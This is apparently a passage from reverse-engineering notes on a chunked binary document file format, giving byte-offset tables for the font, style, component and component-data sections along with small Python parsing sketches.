Chunk Data is (Number of Contiguous Chunks)*256-6 bytes long. That means that if there is only 1 Contiguous Chunk, then Chunk Data is 250 bytes long, and Next Chunk ID is located at the end of the chunk.

This system means that all sections will be padded to fit into their respective chunks.

When describing section formats below, we will ignore the chunk system, and simply focus on the format of the data that is stuffed into those chunks.
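Stripping the chunk system away can be sketched in Python as follows. How a Chunk ID maps to a file offset is left to a caller-supplied read_at(chunk_id, nbytes) callback, which is my own invention for the example; it should return nbytes starting at the beginning of that chunk. The sketch also accepts a negative starting ID, in case a section begins with a Contiguous Chunk.

```python
import struct

CHUNK_SIZE = 256


def read_section(read_at, chunk_id):
    """Follow a chain of chunks and return the section data."""
    data = bytearray()
    contiguous = chunk_id < 0
    chunk_id = abs(chunk_id)
    while chunk_id != 0:
        if contiguous:
            # Contiguous Chunk: 2-byte count, data, then Next Chunk ID.
            (count,) = struct.unpack(">H", read_at(chunk_id, 2))
            raw = read_at(chunk_id, count * CHUNK_SIZE)
            data += raw[2:-4]
        else:
            # Regular chunk: 0xfc bytes of data, then Next Chunk ID.
            raw = read_at(chunk_id, CHUNK_SIZE)
            data += raw[:-4]
        (next_id,) = struct.unpack(">i", raw[-4:])  # signed
        contiguous = next_id < 0
        chunk_id = abs(next_id)
    return bytes(data)


# A made-up two-link chain: regular chunk 1, then contiguous chunk 2.
chunks = {
    1: b"A" * 252 + struct.pack(">i", -2),
    2: struct.pack(">H", 2) + b"B" * 506 + struct.pack(">i", 0),
}
section = read_section(lambda cid, n: chunks[cid][:n], 1)
print(len(section))
```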

Font Section:
The Font section contains a list of all the fonts used in this document. The fonts listed in this section are referenced in the rest of the file by their ID number.

0000 0004 Length
0004 0002 Number of Fonts
0006 **** Font Record 0
**** **** Font Record 1
**** **** Font Record 2 ...

Each Font Record looks like so.
0000 0002 Font ID
0002 0002 Padding
0004 0001 Font Name Length
0005 **** Font name
**** 0001 Short Name Length
**** **** Short Name

Style Section:
The Style section contains a list of all the Paragraph and Character styles used in the document. The overall section is structured as follows.

0000 0004 Length of Character Styles
0004 009a Character Style 0
009e 009a Character Style 1
0138 009a Character Style 2...
**** 0004 Length of Paragraph Styles
**** 00c6 Paragraph Style 0
**** 00c6 Paragraph Style 1
**** 00c6 Paragraph Style 2...

Each Character Style is 154 bytes long and is structured like so.

0000 0001 Length of Style Name
0001 0055 Style Name
0056 0002 Font ID
0058 0002 Font Flags
005a 0004 Font Size (16.16 fixed text size)
005e 001f Unknown
0079 0001 Hide Flag (notes have this flag set)
007a 0020 Unknown

Character Style Flags:
0001 Bold
0002 Italic
0004 Underline
0008 Outline
0010 Dropshadow
0020 Superscript
0040 Subscript
0100 Superior
0200 Strikeout
0400 Allcaps
0800 Smallcaps
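Decoding the flags and the fixed-point font size takes only a few lines. A Python sketch, with names of my own choosing:

```python
STYLE_FLAGS = {
    0x0001: "Bold",
    0x0002: "Italic",
    0x0004: "Underline",
    0x0008: "Outline",
    0x0010: "Dropshadow",
    0x0020: "Superscript",
    0x0040: "Subscript",
    0x0100: "Superior",
    0x0200: "Strikeout",
    0x0400: "Allcaps",
    0x0800: "Smallcaps",
}


def decode_font_flags(flags):
    """List the style names whose bits are set in Font Flags."""
    return [name for bit, name in STYLE_FLAGS.items() if flags & bit]


def fixed_16_16(raw):
    """Convert a 16.16 fixed-point value to a float."""
    return raw / 65536.0


print(decode_font_flags(0x0003))
print(fixed_16_16(0x000C0000))
```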

Each Paragraph Style is 198 bytes long and looks like so.

0000 0001 Style Name Length
0001 003f Style Name
0040 0002 Style ID
0042 0016 Reserved
0058 0002 Justification
005a 006c Reserved

Component Section:
The Component section lists the name and type of all the components in the file.
0000 0004 Unknown
0004 0004 Component Section Length
0008 0008 Reserved
0010 0002 Number of Components
0012 001e Reserved
0030 008e Component 0
00be 008e Component 1
014c 008e Component 2...

Each Component is 142 bytes long and is structured like so.

0000 0018 Unknown
0018 0004 Component ID
001c 0004 Unknown
0020 0001 Type Length
0021 001f Component Type
0040 0001 Name Length
0041 001f Component Name
0060 002e Reserved

Component Data Section:
The Component Data section contains the raw data for each component.

0000 0002 Number of Components
0002 001c Component Index 1
001e 001c Component Index 2
003a 001c Component Index 3...

Some components have some extra information at the end of them... so you cannot rely on the offsets of any component until you have checked the component prior. Each component index is fairly straightforward.

0000 0004 Unknown
0004 0004 Flags
0008 0008 Reserved
0010 0004 Chunk ID
0014 0004 Component ID
0018 0004 Reserved
001c 0004 Extra Length
0020 **** Extra Data

If Flags is nonzero, then Extra Length and Extra Data are present. Extra Data contains information such as the filename that the component was imported from.

Each Component Index points to a Chunk that contains pointers to the raw text and styles of the component.

0000 0004 Length of text in this component
0004 0004 Number of Paragraphs * 8
0008 0004 Paragraph 0 Chunk ID
000c 0004 Paragraph 0 Length
0010 0004 Paragraph 1 Chunk ID
0014 0004 Paragraph 1 Length...
**** **** Character Styles
**** **** Paragraph Styles

The Paragraph Chunks are special Chunks. They don't follow the standard Chunk format at all. Paragraph 0 starts at the referenced Chunk ID, however, the data of that block just continues from the beginning for length bytes. There is no chunk metadata at all.

The Character Styles are shown below.

0000 0004 Number of Character Styles * 8
0004 0004 Style 0 ID
0008 0004 Style 0 Length
000c 0004 Style 1 ID
0010 0004 Style 1 Length...

The way the styles work is pretty simple. Style ID references a specific Style in the Style Section. This style applies for Length bytes of text. Then the next style referenced takes over and applies to the next Length bytes of text, and so on.

Paragraph Styles work in the exact same way.
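Here is a short Python sketch of applying those runs to the text. It takes the runs as (Style ID, Length) pairs that have already been read out of the file; the function name and sample data are mine.

```python
def apply_style_runs(text, runs):
    """Split text into (style_id, slice) pairs following the run lengths."""
    spans = []
    pos = 0
    for style_id, length in runs:
        # Each style covers the next `length` bytes of text.
        spans.append((style_id, text[pos:pos + length]))
        pos += length
    return spans


spans = apply_style_runs(b"Hello world", [(3, 5), (7, 6)])
print(spans)
```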

QPS Header:
This header is identical to the format used in the QPS Protocol (more on that later).